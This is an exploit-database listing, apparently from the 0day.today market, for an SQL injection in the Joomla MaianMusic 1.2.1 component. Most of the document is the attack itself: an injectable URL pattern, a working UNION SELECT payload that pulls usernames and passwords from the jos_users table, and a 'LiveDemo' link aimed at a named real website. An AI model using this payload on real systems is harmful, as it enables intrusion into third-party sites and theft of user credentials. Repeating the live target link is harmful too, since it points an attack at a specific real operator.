[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component Maian Music 1.2.1 (category) SQL Injection Vuln

Author
H!tm@N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5001
Category
web applications
Date add
07-04-2009
Platform
unsorted
================================================================
Joomla Component Maian Music 1.2.1 (category) SQL Injection Vuln
================================================================

#############################################################################
#							                    #
#           Joomla Component MaianMusic SQL Injection Vulnerability         #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "MaianMusic (com_maianmusic)"
[~] Version:        "1.2.1" 
[~] Date:           "09-26-2008"
[~] Author:         "Arelowo Alao & David Bennett"
[~] Author E-mail:  "Alao@aretimes.com"
[~] Author URL:     "www.aretimes.com"

########################################

[~] Exploit: /index.php?option=com_maianmusic&section=category&category=[SQL]&Itemid=70
[~] Example: /index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70

########################################

[~] LiveDemo: http://musicsunderground.com/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users--&Itemid=70&lang=en

########################################



#  0day.today [2024-12-25]  #